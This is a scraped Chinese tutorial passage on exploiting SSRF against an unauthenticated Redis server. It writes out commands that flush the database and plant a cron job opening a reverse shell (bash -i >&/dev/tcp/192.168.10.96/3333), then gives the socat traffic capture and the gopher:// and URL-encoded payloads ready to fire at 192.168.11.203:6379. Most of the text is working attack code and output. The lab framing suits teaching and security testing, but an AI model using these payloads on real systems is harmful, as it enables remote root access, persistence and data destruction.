ssrf漏洞(上) · Farmsec Open Source(5)
时间:2022-12-04 19:15 来源:网络整理 作者:采集插件 点击:次
另开一终端,依次敲入以下命令 redis-cli -h 127.0.0.1 flushall #删除Redis中的所有存在的key,不仅仅是当前的数据库。也就是清空数据库。 echo -e "\n\n*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1\n\n"|redis-cli -h 127.0.0.1 -x set farmsec #将echo的内容通过客户端写入到缓冲区中赋值给farmsec redis-cli -h 127.0.0.1 config set dir /var/spool/cron/ #设置工作目录 redis-cli -h 127.0.0.1 config set dbfilename root #设置保存文件名字 redis-cli -h 127.0.0.1 save #将缓存区内容写入到root文件内
回到socat终端,将流量内容复制 > 2022/04/08 10:35:41.854951 length=18 from=0 to=17 *1\r $8\r flushall\r < 2022/04/08 10:35:41.916498 length=5 from=0 to=4 +OK\r > 2022/04/08 10:35:52.438603 length=92 from=0 to=91 *3\r $3\r set\r $7\r farmsec\r $59\r */1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1 \r < 2022/04/08 10:35:52.439439 length=5 from=0 to=4 +OK\r > 2022/04/08 10:36:02.585302 length=57 from=0 to=56 *4\r $6\r config\r $3\r set\r $3\r dir\r $16\r /var/spool/cron/\r < 2022/04/08 10:36:02.586108 length=5 from=0 to=4 +OK\r > 2022/04/08 10:36:08.471573 length=52 from=0 to=51 *4\r $6\r config\r $3\r set\r $10\r dbfilename\r $4\r root\r < 2022/04/08 10:36:08.472274 length=5 from=0 to=4 +OK\r > 2022/04/08 10:41:22.008184 length=14 from=0 to=13 *1\r $4\r save\r < 2022/04/08 10:41:22.014742 length=5 from=0 to=4 +OK\r
计划任务为每隔一分钟执行一次反弹,最多等待一分钟即可看到反弹回来的shell,表明测试语句可以执行攻击成功 测试机192.168.11.192计划任务:
nc反弹监听:
复制socat抓取到的攻击流量,保存到ssrftool工具包1.txt中
将攻击语句格式化为gopher协议格式 python 1.py 1.txt *1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a
将格式化后攻击语句开头添加攻击目标gopher://192.168.11.203:6379/_ gopher://192.168.11.203:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a 7.4.11 攻击语句url编码url编码: gopher%3A%2F%2F192.168.11.203%3A6379%2F_*1%250d%250a%248%250d%250aflushall%250d%250a*3%250d%250a%243%250d%250aset%250d%250a%247%250d%250afarmsec%250d%250a%2459%250d%250a%250a%250a*%2F1%20*%20*%20*%20*%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.10.96%2F3333%200%3E%261%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a%250a 7.4.12 测试攻击语句 (责任编辑:admin) |
